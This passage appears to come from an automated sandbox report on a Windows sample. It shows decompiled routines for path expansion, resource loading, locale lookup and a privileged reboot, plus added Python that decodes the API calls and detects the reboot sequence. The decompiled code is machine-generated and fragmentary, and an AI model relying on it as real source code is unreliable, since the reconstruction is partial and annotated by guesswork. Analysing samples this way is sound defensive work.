                                                                                    						goto L10;
                                                                                    					}
                                                                                     					_t30 = _t30 | 0xffffffff; // -1: a region could not be released
                                                                                    				} else {
                                                                                     					_t20 = VirtualFree(_t34, 0, 0x8000); // executed; 0x8000 == MEM_RELEASE
                                                                                    					if(_t20 == 0) {
                                                                                     						_t30 = _t29 | 0xffffffff; // -1 on failure
                                                                                    					} else {
                                                                                    						_t30 = 0;
                                                                                    					}
                                                                                    				}
                                                                                    				L10:
                                                                                     				if(_t30 == 0) {
                                                                                     					// unlink the header from the doubly linked large-block list (next at +0, prev at +4)
                                                                                     					 *_v48 =  *_t42;
                                                                                     					 *( *_t42 + 4) = _v48;
                                                                                     				}
                                                                                    				 *0x4bdb78 = 0;
                                                                                    				return _t30;
                                                                                     			}

                                                                                    APIs
                                                                                    • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00403D27
                                                                                    • VirtualQuery.KERNEL32(?,?,0000001C), ref: 00403D4A
                                                                                    • VirtualFree.KERNEL32(?,00000000,00008000,?,?,0000001C), ref: 00403D57
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.440932524.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                     • Associated: 0000000A.00000002.440903891.0000000000400000.00000002.00020000.sdmp
                                                                                     • Associated: 0000000A.00000002.441032617.00000000004B7000.00000004.00020000.sdmp
                                                                                     • Associated: 0000000A.00000002.441052011.00000000004C0000.00000004.00020000.sdmp
                                                                                     • Associated: 0000000A.00000002.441064981.00000000004C4000.00000002.00020000.sdmp
                                                                                     • Associated: 0000000A.00000002.441078105.00000000004C6000.00000002.00020000.sdmp
                                                                                    Similarity
                                                                                    • API ID: Virtual$Free$Query
                                                                                    • String ID:
                                                                                    • API String ID: 778034434-0
                                                                                    • Opcode ID: 70118730a538275f8eba95c50282fe5a7e92951222106072b386c800723d93a4
                                                                                    • Instruction ID: 6789628300bf7aa479fe1b8b627d7daf3441881ad106b622f2e79b23e4dc796b
                                                                                    • Opcode Fuzzy Hash: 70118730a538275f8eba95c50282fe5a7e92951222106072b386c800723d93a4
                                                                                    • Instruction Fuzzy Hash: C5F06D353046005FD311DF1AC844B17BBE9EFC5711F15C67AE888973A1E635DD018796
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Non-executed Functions

                                                                                    C-Code - Quality: 78%
                                                                                    			E0040A928(short* __eax, intOrPtr __edx) {
                                                                                    				short* _v8;
                                                                                    				intOrPtr _v12;
                                                                                    				intOrPtr _v16;
                                                                                    				void* _v20;
                                                                                    				struct _WIN32_FIND_DATAW _v612;
                                                                                    				short _v1134;
                                                                                    				signed int _t50;
                                                                                    				signed int _t51;
                                                                                    				void* _t55;
                                                                                    				signed int _t88;
                                                                                    				signed int _t89;
                                                                                    				intOrPtr* _t90;
                                                                                    				signed int _t101;
                                                                                    				signed int _t102;
                                                                                    				short* _t112;
                                                                                    				struct HINSTANCE__* _t113;
                                                                                    				short* _t115;
                                                                                    				short* _t116;
                                                                                    				void* _t117;
                                                                                    
                                                                                    				_v12 = __edx;
                                                                                    				_v8 = __eax;
                                                                                    				_v16 = _v8;
                                                                                    				_t113 = GetModuleHandleW(L"kernel32.dll");
                                                                                    				if(_t113 == 0) {
                                                                                    					L4:
                                                                                     					if( *_v8 != 0x5c) { // 0x5c == L'\\': not a UNC path, so the walk starts right after the drive spec
                                                                                    						_t115 = _v8 + 4;
                                                                                    						goto L10;
                                                                                    					} else {
                                                                                     						if( *((short*)(_v8 + 2)) == 0x5c) { // "\\server\share": keep server and share names as the fixed prefix
                                                                                    							_t116 = E0040A904(_v8 + 4);
                                                                                    							if( *_t116 != 0) {
                                                                                    								_t14 = _t116 + 2; // 0x2
                                                                                    								_t115 = E0040A904(_t14);
                                                                                    								if( *_t115 != 0) {
                                                                                    									L10:
                                                                                    									_t88 = _t115 - _v8;
                                                                                    									_t89 = _t88 >> 1;
                                                                                    									if(_t88 < 0) {
                                                                                    										asm("adc ebx, 0x0");
                                                                                    									}
                                                                                    									_t43 = _t89 + 1;
                                                                                     									if(_t89 + 1 <= 0x105) { // 0x105 == MAX_PATH + 1 WCHARs, leaving room for the terminator
                                                                                    										E0040A34C( &_v1134, _v8, _t43);
                                                                                    										while( *_t115 != 0) {
                                                                                    											_t112 = E0040A904(_t115 + 2);
                                                                                    											_t50 = _t112 - _t115;
                                                                                    											_t51 = _t50 >> 1;
                                                                                    											if(_t50 < 0) {
                                                                                    												asm("adc eax, 0x0");
                                                                                    											}
                                                                                    											if(_t51 + _t89 + 1 <= 0x105) {
                                                                                    												_t55 =  &_v1134 + _t89 + _t89;
                                                                                    												_t101 = _t112 - _t115;
                                                                                    												_t102 = _t101 >> 1;
                                                                                    												if(_t101 < 0) {
                                                                                    													asm("adc edx, 0x0");
                                                                                    												}
                                                                                    												E0040A34C(_t55, _t115, _t102 + 1);
                                                                                     												_v20 = FindFirstFileW( &_v1134,  &_v612); // resolve this component (8.3 alias or differing case) to its on-disk name
                                                                                     												if(_v20 != 0xffffffff) { // INVALID_HANDLE_VALUE: component not found, the caller's path is left untouched
                                                                                     													FindClose(_v20); // only cFileName is needed
                                                                                    													if(lstrlenW( &(_v612.cFileName)) + _t89 + 1 + 1 <= 0x105) {
                                                                                    														 *((short*)(_t117 + _t89 * 2 - 0x46a)) = 0x5c;
                                                                                    														E0040A34C( &_v1134 + _t89 + _t89 + 2,  &(_v612.cFileName), 0x105 - _t89 - 1);
                                                                                    														_t89 = _t89 + lstrlenW( &(_v612.cFileName)) + 1;
                                                                                    														_t115 = _t112;
                                                                                    														continue;
                                                                                    													}
                                                                                    												}
                                                                                    											}
                                                                                    											goto L24;
                                                                                    										}
                                                                                     										E0040A34C(_v8,  &_v1134, _v12); // copy the expanded path back into the caller's buffer, bounded by _v12
                                                                                    									}
                                                                                    								}
                                                                                    							}
                                                                                    						}
                                                                                    					}
                                                                                    				} else {
                                                                                     					_t90 = GetProcAddress(_t113, "GetLongPathNameW"); // preferred: let the OS expand the path
                                                                                     					if(_t90 == 0) { // export missing on old Windows: fall back to the FindFirstFileW walk below
                                                                                    						goto L4;
                                                                                    					} else {
                                                                                    						_push(0x105);
                                                                                    						_push( &_v1134);
                                                                                    						_push(_v8);
                                                                                    						if( *_t90() == 0) {
                                                                                    							goto L4;
                                                                                    						} else {
                                                                                    							E0040A34C(_v8,  &_v1134, _v12);
                                                                                    						}
                                                                                    					}
                                                                                    				}
                                                                                    				L24:
                                                                                    				return _v16;
                                                                                     			}
                                                                                    0x0040a9c9
                                                                                    0x0040a9b5
                                                                                    0x0040a99e
                                                                                    0x0040a950
                                                                                    0x0040a95b
                                                                                    0x0040a95f
                                                                                    0x00000000
                                                                                    0x0040a961
                                                                                    0x0040a961
                                                                                    0x0040a96c
                                                                                    0x0040a970
                                                                                    0x0040a975
                                                                                    0x00000000
                                                                                    0x0040a977
                                                                                    0x0040a983
                                                                                    0x0040a983
                                                                                    0x0040a975
                                                                                    0x0040a95f
                                                                                    0x0040aade
                                                                                    0x0040aae7

                                                                                    APIs
                                                                                    • GetModuleHandleW.KERNEL32(kernel32.dll,004162BC,?,?), ref: 0040A945
                                                                                    • GetProcAddress.KERNEL32(00000000,GetLongPathNameW), ref: 0040A956
                                                                                    • FindFirstFileW.KERNEL32(?,?,kernel32.dll,004162BC,?,?), ref: 0040AA56
                                                                                    • FindClose.KERNEL32(?,?,?,kernel32.dll,004162BC,?,?), ref: 0040AA68
                                                                                    • lstrlenW.KERNEL32(?,?,?,?,kernel32.dll,004162BC,?,?), ref: 0040AA74
                                                                                    • lstrlenW.KERNEL32(?,?,?,?,?,kernel32.dll,004162BC,?,?), ref: 0040AAB9
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.440932524.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                     • Associated: 0000000A.00000002.440903891.0000000000400000.00000002.00020000.sdmp
                                                                                     • Associated: 0000000A.00000002.441032617.00000000004B7000.00000004.00020000.sdmp
                                                                                     • Associated: 0000000A.00000002.441052011.00000000004C0000.00000004.00020000.sdmp
                                                                                     • Associated: 0000000A.00000002.441064981.00000000004C4000.00000002.00020000.sdmp
                                                                                     • Associated: 0000000A.00000002.441078105.00000000004C6000.00000002.00020000.sdmp
                                                                                    Similarity
                                                                                    • API ID: Findlstrlen$AddressCloseFileFirstHandleModuleProc
                                                                                    • String ID: GetLongPathNameW$\$kernel32.dll
                                                                                    • API String ID: 1930782624-3908791685
                                                                                    • Opcode ID: 2e7747c66ca0daf9bf73dcf24122f514d4f35ae2d915a4be054088bbf24f0c4d
                                                                                    • Instruction ID: 0568a8f2c4c85ac628058e700237ad117df8c3680498263a44950cac296231c5
                                                                                    • Opcode Fuzzy Hash: 2e7747c66ca0daf9bf73dcf24122f514d4f35ae2d915a4be054088bbf24f0c4d
                                                                                    • Instruction Fuzzy Hash: 7841A071B003189BCB20DE98CD85A9EB3B5AB44310F1485B69945F72C1EB7CAE51CF4A
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 91%
                                                                                     			E004AF110() {
                                                                                     				int _v4;                                      // Privileges[0].Attributes of the TOKEN_PRIVILEGES below
                                                                                     				struct _TOKEN_PRIVILEGES _v16;
                                                                                     				void* _v20;                                   // process token handle; never closed on any path
                                                                                     				int _t7;
                                                                                     
                                                                                     				if(E0041FF2C() != 2) {                        // only a return value of 2 takes the privilege path; anything else reboots directly (consistent with a VER_PLATFORM_WIN32_NT check, not confirmed on this page)
                                                                                     					L5:
                                                                                     					_t7 = ExitWindowsEx(2, 0);                // 2 = EWX_REBOOT, no shutdown reason code
                                                                                     					asm("sbb eax, eax");
                                                                                     					return _t7 + 1;                           // BOOL result folded to 0/1
                                                                                     				}
                                                                                     				if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v20) != 0) {   // 0x28 = TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY
                                                                                     					LookupPrivilegeValueW(0, L"SeShutdownPrivilege",  &(_v16.Privileges));   // return value not checked
                                                                                     					_v16.PrivilegeCount = 1;
                                                                                     					_v4 = 2;                                  // SE_PRIVILEGE_ENABLED
                                                                                     					AdjustTokenPrivileges(_v20, 0,  &_v16, 0, 0, 0);
                                                                                     					if(GetLastError() == 0) {                 // ERROR_SUCCESS; ERROR_NOT_ALL_ASSIGNED means the privilege is not held, and no reboot is attempted
                                                                                     						goto L5;
                                                                                     					}
                                                                                     					return 0;
                                                                                     				}
                                                                                     				return 0;
                                                                                     			}

                                                                                     Instruction addresses for the decompiled lines above: 0x004af11b, 0x004af178, 0x004af17c, 0x004af184, 0x00000000, 0x004af186, 0x004af12d, 0x004af13f, 0x004af144, 0x004af14c, 0x004af166, 0x004af172, 0x00000000, 0x00000000, 0x00000000, 0x004af174, 0x00000000

                                                                                    APIs
                                                                                    • GetCurrentProcess.KERNEL32(00000028), ref: 004AF120
                                                                                    • OpenProcessToken.ADVAPI32(00000000,00000028), ref: 004AF126
                                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,00000028), ref: 004AF13F
                                                                                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000002,00000000,00000000,00000000), ref: 004AF166
                                                                                    • GetLastError.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 004AF16B
                                                                                    • ExitWindowsEx.USER32(00000002,00000000), ref: 004AF17C
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.440932524.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                     • Associated: 0000000A.00000002.440903891.0000000000400000.00000002.00020000.sdmp
                                                                                     • Associated: 0000000A.00000002.441032617.00000000004B7000.00000004.00020000.sdmp
                                                                                     • Associated: 0000000A.00000002.441052011.00000000004C0000.00000004.00020000.sdmp
                                                                                     • Associated: 0000000A.00000002.441064981.00000000004C4000.00000002.00020000.sdmp
                                                                                     • Associated: 0000000A.00000002.441078105.00000000004C6000.00000002.00020000.sdmp
                                                                                    Similarity
                                                                                    • API ID: ProcessToken$AdjustCurrentErrorExitLastLookupOpenPrivilegePrivilegesValueWindows
                                                                                    • String ID: SeShutdownPrivilege
                                                                                    • API String ID: 107509674-3733053543
                                                                                    • Opcode ID: dbd0b99069aff0d6788c9efc2bbd2c2bb6d4dae2a155ecb9c3cc528dabbfbf9f
                                                                                    • Instruction ID: 15d82be9bc359c8987119149698676c325083c88dcd196a4f2f9cd1a299335ef
                                                                                    • Opcode Fuzzy Hash: dbd0b99069aff0d6788c9efc2bbd2c2bb6d4dae2a155ecb9c3cc528dabbfbf9f
                                                                                    • Instruction Fuzzy Hash: 75F06D70684301B5E610A6F2CD07F6B21C89B56B58FA00D3EBA84E91C2D7BDD81D42BF
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 100%
                                                                                     			E004AF9F0() {
                                                                                     				struct HRSRC__* _t10;
                                                                                     				void* _t11;
                                                                                     				void* _t12;
                                                                                     
                                                                                     				_t10 = FindResourceW(0, 0x2b67, 0xa);         // hModule 0 = own image; name = MAKEINTRESOURCE(11111); type 0xa = RT_RCDATA
                                                                                     				if(_t10 == 0) {
                                                                                     					E004AF834();                              // called on every failure below with no return afterwards, so it presumably does not return
                                                                                     				}
                                                                                     				if(SizeofResource(0, _t10) != 0x2c) {         // the blob must be exactly 0x2c = 44 bytes
                                                                                     					E004AF834();
                                                                                     				}
                                                                                     				_t11 = LoadResource(0, _t10);
                                                                                     				if(_t11 == 0) {
                                                                                     					E004AF834();
                                                                                     				}
                                                                                     				_t12 = LockResource(_t11);
                                                                                     				if(_t12 == 0) {
                                                                                     					E004AF834();
                                                                                     				}
                                                                                     				return _t12;                                  // pointer to the 44-byte RCDATA blob
                                                                                     			}

                                                                                     Instruction addresses for the decompiled lines above: 0x004af9ff, 0x004afa03, 0x004afa05, 0x004afa05, 0x004afa15, 0x004afa17, 0x004afa17, 0x004afa24, 0x004afa28, 0x004afa2a, 0x004afa2a, 0x004afa35, 0x004afa39, 0x004afa3b, 0x004afa3b, 0x004afa43

                                                                                    APIs
                                                                                    • FindResourceW.KERNEL32(00000000,00002B67,0000000A,?,004B5F8E,00000000,004B654A,?,00000001,00000000,00000002,00000000,004B659E,?,00000000,004B65E2), ref: 004AF9FA
                                                                                    • SizeofResource.KERNEL32(00000000,00000000,00000000,00002B67,0000000A,?,004B5F8E,00000000,004B654A,?,00000001,00000000,00000002,00000000,004B659E), ref: 004AFA0D
                                                                                    • LoadResource.KERNEL32(00000000,00000000,00000000,00000000,00000000,00002B67,0000000A,?,004B5F8E,00000000,004B654A,?,00000001,00000000,00000002,00000000), ref: 004AFA1F
                                                                                    • LockResource.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00002B67,0000000A,?,004B5F8E,00000000,004B654A,?,00000001,00000000,00000002), ref: 004AFA30
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.440932524.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                     • Associated: 0000000A.00000002.440903891.0000000000400000.00000002.00020000.sdmp
                                                                                     • Associated: 0000000A.00000002.441032617.00000000004B7000.00000004.00020000.sdmp
                                                                                     • Associated: 0000000A.00000002.441052011.00000000004C0000.00000004.00020000.sdmp
                                                                                     • Associated: 0000000A.00000002.441064981.00000000004C4000.00000002.00020000.sdmp
                                                                                     • Associated: 0000000A.00000002.441078105.00000000004C6000.00000002.00020000.sdmp
                                                                                    Similarity
                                                                                    • API ID: Resource$FindLoadLockSizeof
                                                                                    • String ID:
                                                                                    • API String ID: 3473537107-0
                                                                                    • Opcode ID: 128b44542abe6d6e0e09835f67cf23f4a4e4be27e5836866f54195567a651b81
                                                                                    • Instruction ID: 8c15b2061d88d30e204a2d131290402b8da5209396f43898e5d703764eea749b
                                                                                    • Opcode Fuzzy Hash: 128b44542abe6d6e0e09835f67cf23f4a4e4be27e5836866f54195567a651b81
                                                                                    • Instruction Fuzzy Hash: FCE07E8074634625FA6436F718D7BAE00084B36B4DF40593FFA08A92D2EEAC8C19522E
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%
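The two routines above (E004AF110 and E004AF9F0) are easier to assess once their numeric arguments are decoded. The following Python is an added example written for this page, not code from the sandbox report or from the sample: it parses API lines in the report's own "• Api.MODULE(args), ref: ADDR" form (the input is copied from the E004AF110 and E004AF9F0 lists above and embedded as constructed test data), decodes the token access mask, the ExitWindowsEx flags and the resource type against the documented SDK constants, and flags the open-token, lookup-privilege, adjust, ExitWindowsEx sequence that E004AF110 implements. The function and table names are assumptions of this example; the constant values are the SDK's.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# Constructed input: the API lines of E004AF110 plus the first line of E004AF9F0,
# copied in the "• Api.MODULE(args), ref: ADDR" form this report uses.
REPORT_LINES = """
• GetCurrentProcess.KERNEL32(00000028), ref: 004AF120
• OpenProcessToken.ADVAPI32(00000000,00000028), ref: 004AF126
• LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,00000028), ref: 004AF13F
• AdjustTokenPrivileges.ADVAPI32(?,00000000,00000002,00000000,00000000,00000000), ref: 004AF166
• GetLastError.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 004AF16B
• ExitWindowsEx.USER32(00000002,00000000), ref: 004AF17C
• FindResourceW.KERNEL32(00000000,00002B67,0000000A,?,004B5F8E), ref: 004AF9FA
"""

LINE_RE = re.compile(
    r"•\s*(?P<api>\w+)\.(?P<mod>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)

# Windows constants relevant to the calls above (values as in the SDK headers).
TOKEN_ACCESS: Dict[int, str] = {
    0x0001: "TOKEN_ASSIGN_PRIMARY", 0x0002: "TOKEN_DUPLICATE", 0x0004: "TOKEN_IMPERSONATE",
    0x0008: "TOKEN_QUERY", 0x0010: "TOKEN_QUERY_SOURCE", 0x0020: "TOKEN_ADJUST_PRIVILEGES",
    0x0040: "TOKEN_ADJUST_GROUPS", 0x0080: "TOKEN_ADJUST_DEFAULT", 0x0100: "TOKEN_ADJUST_SESSIONID",
}
EWX_FLAGS: Dict[int, str] = {
    0x00: "EWX_LOGOFF", 0x01: "EWX_SHUTDOWN", 0x02: "EWX_REBOOT",
    0x04: "EWX_FORCE", 0x08: "EWX_POWEROFF", 0x10: "EWX_FORCEIFHUNG",
}
RESOURCE_TYPES: Dict[int, str] = {
    1: "RT_CURSOR", 2: "RT_BITMAP", 3: "RT_ICON", 4: "RT_MENU", 5: "RT_DIALOG",
    6: "RT_STRING", 9: "RT_ACCELERATOR", 10: "RT_RCDATA", 11: "RT_MESSAGETABLE",
    14: "RT_GROUP_ICON", 16: "RT_VERSION", 24: "RT_MANIFEST",
}


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[str]   # raw argument tokens; "?" means the sandbox could not recover the value
    ref: int          # address of the call instruction


def parse_api_lines(text: str) -> List[ApiCall]:
    """Parse report lines into ApiCall records, ordered by call address."""
    calls = []
    for line in text.splitlines():
        m = LINE_RE.search(line)
        if not m:
            continue
        raw = m.group("args").strip()
        args = [a.strip() for a in raw.split(",")] if raw else []
        calls.append(ApiCall(m.group("api"), m.group("mod"), args, int(m.group("ref"), 16)))
    return sorted(calls, key=lambda c: c.ref)


def hex_arg(arg: str) -> Optional[int]:
    """Numeric value of an argument token, or None for '?' and string literals."""
    try:
        return int(arg, 16)
    except ValueError:
        return None


def decode_flags(value: int, table: Dict[int, str]) -> str:
    if value == 0 and 0 in table:
        return table[0]
    names = [n for bit, n in table.items() if bit and value & bit == bit]
    return "|".join(names) if names else hex(value)


def annotate(call: ApiCall) -> str:
    """Human-readable decoding of the constants that matter in these two functions."""
    a = call.args
    if call.api == "OpenProcessToken" and len(a) >= 2 and hex_arg(a[1]) is not None:
        return "DesiredAccess=" + decode_flags(hex_arg(a[1]), TOKEN_ACCESS)
    if call.api == "LookupPrivilegeValueW" and len(a) >= 2:
        return "privilege=" + a[1]
    if call.api == "ExitWindowsEx" and a and hex_arg(a[0]) is not None:
        return "uFlags=" + decode_flags(hex_arg(a[0]), EWX_FLAGS)
    if (call.api == "FindResourceW" and len(a) >= 3
            and hex_arg(a[1]) is not None and hex_arg(a[2]) is not None):
        rtype = hex_arg(a[2])
        return "lpName=#%d lpType=%s" % (hex_arg(a[1]), RESOURCE_TYPES.get(rtype, hex(rtype)))
    return ""


SHUTDOWN_CHAIN = ("OpenProcessToken", "LookupPrivilegeValueW",
                  "AdjustTokenPrivileges", "ExitWindowsEx")


def detect_privileged_shutdown(calls: List[ApiCall]) -> bool:
    """True when, in address order, a token is opened, SeShutdownPrivilege is looked up,
    privileges are adjusted and ExitWindowsEx follows: the pattern of E004AF110."""
    stage = 0
    for c in calls:
        if c.api != SHUTDOWN_CHAIN[stage]:
            continue
        if c.api == "LookupPrivilegeValueW" and "SeShutdownPrivilege" not in c.args:
            continue
        stage += 1
        if stage == len(SHUTDOWN_CHAIN):
            return True
    return False


if __name__ == "__main__":
    parsed = parse_api_lines(REPORT_LINES)
    for c in parsed:
        print("%08x %-22s %s" % (c.ref, c.api, annotate(c)))
    print("privileged reboot pattern:", detect_privileged_shutdown(parsed))
```

The chain check is deliberately order-sensitive: a function that merely imports these APIs does not match, while the address-ordered sequence the report shows for E004AF110 does.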

                                                                                    C-Code - Quality: 71%
                                                                                    			E0040A4CC(signed short __eax, void* __ebx, intOrPtr* __edx, void* __edi, void* __esi) {
                                                                                    				intOrPtr* _v8;
                                                                                    				intOrPtr _v12;
                                                                                    				short _v182;
                                                                                    				short _v352;
                                                                                    				char _v356;
                                                                                    				char _v360;
                                                                                    				char _v364;
                                                                                    				int _t58;
                                                                                    				signed int _t61;
                                                                                    				intOrPtr _t70;
                                                                                    				signed short _t80;
                                                                                    				void* _t83;
                                                                                    				void* _t85;
                                                                                    				void* _t86;
                                                                                    
                                                                                    				_t77 = __edi;
                                                                                    				_push(__edi);
                                                                                    				_v356 = 0;
                                                                                    				_v360 = 0;
                                                                                    				_v364 = 0;
                                                                                    				_v8 = __edx;
                                                                                    				_t80 = __eax;
                                                                                    				_push(_t83);
                                                                                     				_push(0x40a631);                              // Delphi-style try/finally frame, handler at 0x40a631
                                                                                     				_push( *[fs:eax]);
                                                                                     				 *[fs:eax] = _t83 + 0xfffffe98;
                                                                                    				E00407A20(_v8);
                                                                                    				_t85 = _t80 -  *0x4b7a08; // 0x404
                                                                                    				if(_t85 >= 0) {
                                                                                    					_t86 = _t80 -  *0x4b7c08; // 0x7c68
                                                                                    					if(_t86 <= 0) {
                                                                                     						_t77 = 0x40;                      // hi index: the table at 0x4b7a08 has 0x41 {LCID, pointer} entries
                                                                                     						_v12 = 0;                         // lo index
                                                                                     						if(0x40 >= _v12) {
                                                                                    							do {
                                                                                    								_t61 = _t77 + _v12 >> 1;
                                                                                    								if(_t80 >=  *((intOrPtr*)(0x4b7a08 + _t61 * 8))) {
                                                                                    									__eflags = _t80 -  *((intOrPtr*)(0x4b7a08 + _t61 * 8));
                                                                                    									if(__eflags <= 0) {
                                                                                    										E0040A3EC( *((intOrPtr*)(0x4b7a0c + _t61 * 8)), _t61, _v8, _t77, _t80, __eflags);
                                                                                    									} else {
                                                                                    										_v12 = _t61 + 1;
                                                                                    										goto L8;
                                                                                    									}
                                                                                    								} else {
                                                                                    									_t77 = _t61 - 1;
                                                                                    									goto L8;
                                                                                    								}
                                                                                    								goto L9;
                                                                                    								L8:
                                                                                    							} while (_t77 >= _v12);
                                                                                    						}
                                                                                    					}
                                                                                    				}
                                                                                    				L9:
                                                                                     				if( *_v8 == 0 && IsValidLocale(_t80 & 0x0000ffff, 2) != 0) {   // no table hit: 2 = LCID_INSTALLED
                                                                                    					_t58 = _t80 & 0x0000ffff;
                                                                                     					GetLocaleInfoW(_t58, 0x59,  &_v182, 0x55);   // 0x59 = LOCALE_SISO639LANGNAME, 0x55-WCHAR buffer
                                                                                     					GetLocaleInfoW(_t58, 0x5a,  &_v352, 0x55);   // 0x5a = LOCALE_SISO3166CTRYNAME
                                                                                    					E0040858C( &_v356, 0x55,  &_v182);
                                                                                    					_push(_v356);
                                                                                    					_push(0x40a64c);
                                                                                    					E0040858C( &_v360, 0x55,  &_v352);
                                                                                    					_push(_v360);
                                                                                    					_push(E0040A65C);
                                                                                    					E0040858C( &_v364, 0x55,  &_v182);
                                                                                    					_push(_v364);
                                                                                     					E004087C4(_v8, _t58, 5, _t77, _t80);   // concatenate the five pushed pieces: ISO 639 name twice, ISO 3166 name, constant strings at 0x40a64c and 0x40a65c
                                                                                    				}
                                                                                    				_pop(_t70);
                                                                                    				 *[fs:eax] = _t70;
                                                                                    				_push(E0040A638);
                                                                                    				return E00407A80( &_v364, 3);
                                                                                    			}
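The binary search and the GetLocaleInfoW fallback in E0040A4CC, as an added Python example that is not part of the report or of the sample. The table and the OS lookup are constructed stand-ins: the sample's real table at 0x4b7a08 (0x41 entries, LCIDs 0x0404..0x7c68) is not printed on this page, and the two constant strings the sample joins the fallback result with are not recoverable here, so the fallback returns the raw (ISO 639, ISO 3166) pair rather than a guessed format. Function names and the sample LCIDs are assumptions of this example.

```python
from typing import Callable, List, Optional, Tuple, Union

# Constructed subset of a sorted (LCID, name) table. The sample's own table is not
# shown on this page, so these entries are illustrative only.
LCID_TABLE: List[Tuple[int, str]] = [
    (0x0404, "zh-TW"),
    (0x0407, "de-DE"),
    (0x0409, "en-US"),
    (0x040C, "fr-FR"),
    (0x0419, "ru-RU"),
    (0x0809, "en-GB"),
]

# Windows constants used by the decompiled routine.
LCID_INSTALLED = 0x2
LOCALE_SISO639LANGNAME = 0x59
LOCALE_SISO3166CTRYNAME = 0x5A

# Constructed stand-in for IsValidLocale(lcid, LCID_INSTALLED) + GetLocaleInfoW,
# so the example runs without Windows: installed LCID -> (ISO 639, ISO 3166).
FAKE_OS_LOCALES = {0x0C09: ("en", "AU"), 0x0409: ("en", "US")}


def os_locale_info(lcid: int) -> Optional[Tuple[str, str]]:
    """None mirrors IsValidLocale failing; otherwise the two GetLocaleInfoW strings."""
    return FAKE_OS_LOCALES.get(lcid)


def lookup_lcid(lcid: int, table: List[Tuple[int, str]]) -> Optional[str]:
    """Binary search as the decompiled loop does it: lo = 0, hi = last index,
    mid = (lo + hi) >> 1, continuing while hi >= lo."""
    if not table or lcid < table[0][0] or lcid > table[-1][0]:
        return None  # outside [first, last] the sample skips the search entirely
    lo, hi = 0, len(table) - 1
    while hi >= lo:
        mid = (lo + hi) >> 1
        key = table[mid][0]
        if lcid < key:
            hi = mid - 1
        elif lcid > key:
            lo = mid + 1
        else:
            return table[mid][1]
    return None


def resolve_locale(
    lcid: int,
    table: List[Tuple[int, str]],
    query: Callable[[int], Optional[Tuple[str, str]]] = os_locale_info,
) -> Union[str, Tuple[str, str], None]:
    """Table hit wins; otherwise fall back to the OS strings the sample fetches after
    IsValidLocale(lcid & 0xffff, LCID_INSTALLED). The sample then joins those strings
    with two constants not visible on this page, so the pair is returned as-is."""
    name = lookup_lcid(lcid, table)
    if name is not None:
        return name
    return query(lcid & 0xFFFF)  # the sample masks the LCID to 16 bits for the OS calls


if __name__ == "__main__":
    for test_lcid in (0x0409, 0x0C09, 0x0500):
        print("0x%04x -> %r" % (test_lcid, resolve_locale(test_lcid, LCID_TABLE)))
```

The range check before the loop matches the two comparisons against the first and last table entries in the decompiled code; an LCID above the last entry (0x0C09 in the constructed data) never enters the search and goes straight to the OS fallback.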

                                                                                     Instruction addresses for the decompiled lines above: 0x0040a4cc, 0x0040a4d7, 0x0040a4da, 0x0040a4e0, 0x0040a4e6, 0x0040a4ec, 0x0040a4ef, 0x0040a4f3, 0x0040a4f4, 0x0040a4f9, 0x0040a4fc, 0x0040a502, 0x0040a507, 0x0040a50e, 0x0040a510, 0x0040a517, 0x0040a519, 0x0040a520, 0x0040a526, 0x0040a528, 0x0040a52d, 0x0040a537, 0x0040a53e, 0x0040a546, 0x0040a558, 0x0040a548, 0x0040a549, 0x00000000
                                                                                    0x0040a549
                                                                                    0x0040a539
                                                                                    0x0040a53b
                                                                                    0x00000000
                                                                                    0x0040a53b
                                                                                    0x00000000
                                                                                    0x0040a55f
                                                                                    0x0040a55f
                                                                                    0x0040a528
                                                                                    0x0040a526
                                                                                    0x0040a517
                                                                                    0x0040a564
                                                                                    0x0040a56a
                                                                                    0x0040a58e
                                                                                    0x0040a592
                                                                                    0x0040a5a3
                                                                                    0x0040a5b9
                                                                                    0x0040a5be
                                                                                    0x0040a5c4
                                                                                    0x0040a5da
                                                                                    0x0040a5df
                                                                                    0x0040a5e5
                                                                                    0x0040a5fb
                                                                                    0x0040a600
                                                                                    0x0040a60e
                                                                                    0x0040a60e
                                                                                    0x0040a615
                                                                                    0x0040a618
                                                                                    0x0040a61b
                                                                                    0x0040a630

                                                                                    APIs
                                                                                    • IsValidLocale.KERNEL32(?,00000002,00000000,0040A631,?,004162BC,?,00000000), ref: 0040A576
                                                                                    • GetLocaleInfoW.KERNEL32(00000000,00000059,?,00000055,?,00000002,00000000,0040A631,?,004162BC,?,00000000), ref: 0040A592
                                                                                    • GetLocaleInfoW.KERNEL32(00000000,0000005A,?,00000055,00000000,00000059,?,00000055,?,00000002,00000000,0040A631,?,004162BC,?,00000000), ref: 0040A5A3
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.440932524.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000A.00000002.440903891.0000000000400000.00000002.00020000.sdmp
                                                                                    • Associated: 0000000A.00000002.441032617.00000000004B7000.00000004.00020000.sdmp
